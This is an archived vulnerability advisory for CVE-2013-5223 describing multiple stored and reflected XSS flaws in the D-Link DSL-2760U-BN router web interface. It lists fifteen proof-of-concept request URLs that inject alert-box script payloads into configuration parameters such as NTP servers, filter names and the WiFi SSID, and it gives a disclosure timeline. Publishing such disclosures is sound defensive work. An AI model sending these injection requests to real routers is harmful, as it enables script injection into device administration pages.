what you don't know can hurt you

D-Link Router 2760N Cross Site Scripting

D-Link Router 2760N Cross Site Scripting
Posted Nov 11, 2013
Authored by Liad Mizrachi

D-Link Router 2760N suffers from multiple persistent and reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-5223
MD5 | 17ed0c63d262c4bed95e5412aaa97d92

D-Link Router 2760N Cross Site Scripting

Change Mirror Download
Advisory:    D-Link Router 2760N (DSL-2760U-BN) Multiple XSS
Author: Liad Mizrachi
Vendor URL: http://www.dlink.com
Status: Fixed
CVE-ID: CVE-2013-5223

==========================
Vulnerability Description
==========================

Multiple Cross-Site Scripting (XSS) vulnerabilities present in D-Link Router 2760N, both stored and reflected in various sections of the router Web-UI.


==========================
PoC
==========================


1) NTS Settings
http://<D_LINK_HOST>/sntpcfg.cgi?ntp_enabled=1&ntpServer1=locahost%22;alert%28%27XSS%27%29;//&ntpServer2=time-nw.nist.gov&ntpServer3=&ntpServer4=&ntpServer5=&timezone_offset=+02:00&timezone=Jerusalem&use_dst=0



2) Dynamic DNS (Reflected/Stored)
http://<D_LINK_HOST>/ddnsmngr.cmd?action=add&service=1&hostname=aaaa&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=zzzzzz&iface=ppp0



3)Parental Control

http://<D_LINK_HOST>/todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&mac=f1:de:f1:ab:cb:6d&days=1&start_time=571&end_time=732



4) URL Filtering
http://<D_LINK_HOST>/urlfilter.cmd?action=set_url&TodUrlAdd=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&port_num=80



5) NAT - Port Triggering
http://<D_LINK_HOST>/scprttrg.cmd?action=add&appName=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&dstWanIf=ppp0&tStart=1111,&tEnd=1112,&tProto=1,&oStart=11,&oEnd=11,&oProto=1,



6) IP Filtering:
http://<D_LINK_HOST>/scoutflt.cmd?action=add&fltName=<script>alert('XSS')</script>&protocol=1&srcAddr=10.0.0.10&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.12&dstMask=255.255.255.0&dstPort=8080



7) IP Filtering - Removal Error:
http://<D_LINK_HOST>/scoutflt.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E



8) Interface Grouping (also reflected on "Local Area Network (LAN) Setup"):
http://<D_LINK_HOST>/portmapcfg.cmd?action=add&groupName=<Script>alert('XSS')</script>&choiceBox=|usb0|wl0|&wanIfName=atm1



9) SNMP
http://<D_LINK_HOST>/snmpconfig.cgi?snmpStatus=1&snmpRoCommunity=%27;alert(%27XSS%27)&snmpRwCommunity=private&snmpSysName=D-LINK&snmpSysContact=unknown&snmpSysLocation=unknown&snmpTrapIp=0.0.0.0



10) Incoming IP Filter:
http://<D_LINK_HOST>/scinflt.cmd?action=add&wanIf=ppp0&fltName=<script>alert('XSS&protocol=2&srcAddr=SS')</script>&srcMask=255.255.255.0&srcPort=80&dstAddr=10.0.0.10&dstMask=255.255.255.0&dstPort=8080



11) Policy Routing Add:
http://<D_LINK_HOST>/prmngr.cmd?action=add&PolicyName=<script>alert('X&SourceIp=SS');</script>&lanIfcName=wl0&wanIf=ppp0&defaultgw=10.0.0.111



12)Policy Routing -Removal Error:
http://<D_LINK_HOST>/prmngr.cmd?action=remove&rmLst=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E



13) Printer Server
http://<D_LINK_HOST>/ippcfg.cmd?action=savapply&ippEnabled=1&ippMake=aa&ippName=aa";alert('XSS-Printer-Sever');//



14) SAMBA Configuration
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';var x="XSS";//&smbDirName=b';alert(x);//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no
OR
http://<D_LINK_HOST>/samba.cgi?enableSmb=1&smbNetBiosName=';alert("SAMBA-X&smbDirName=SS");//&smbUtf8DirName=bbb&smbCharset=utf8&smbUnplug=nolug=no



15) WiFi SSID
Step 1 (Create XSS as Wireless SSID):
http://<D_LINK_HOST>/wlcfg.wl?wlSsidIdx=0&wlEnbl=1&wlHide=0&wlAPIsolation=0&wlSsid=%3CScript%3Ealert(%27XSSID%27)%3C/script%3E&wlCountry=IL&wlMaxAssoc=16&wlDisableWme=0&wlEnableWmf=0&wlEnbl_wl0v1=0&wlSsid_wl0v1=wl0_Guest1&wlHide_wl0v1=0&wlAPIsolation_wl0v1=0&wlDisableWme_wl0v1=0&wlEnableWmf_wl0v1=0&wlMaxAssoc_wl0v1=16&wlEnbl_wl0v2=0&wlSsid_wl0v2=wl0_Guest2&wlHide_wl0v2=0&wlAPIsolation_wl0v2=0&wlDisableWme_wl0v2=0&wlEnableWmf_wl0v2=0&wlMaxAssoc_wl0v2=16&wlEnbl_wl0v3=0&wlSsid_wl0v3=wl0_Guest3&wlHide_wl0v3=0&wlAPIsolation_wl0v3=0&wlDisableWme_wl0v3=0&wlEnableWmf_wl0v3=0&wlMaxAssoc_wl0v3=16

Step 2:
Goto the Wireless -> Security [http://<D_LINK_HOST>/wlsecurity.html]
OR
Goto the Wireless -> MAC Filter [http://<D_LINK_HOST>/wlmacflt.cmd?action=view]




==========================
Disclosure Timeline
==========================


17-Aug-2013 - Vendor Informed - No response.
23-Aug-2013 - Vendor Re-Informed - No response.
01-Sep-2013 - Vendor Re-Informed - No response.
10-Sep-2013 - Vendor Re-Informed - No response.
10-Oct-2013 - Vendor Re-Informed - No response.

==========================
References
==========================


http://www.dlink.com
http://www.dlink.com.tr/en/arts/117.html
http://www.netcheif.com/downloads/DSL-2760U_user_manual.pdf


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close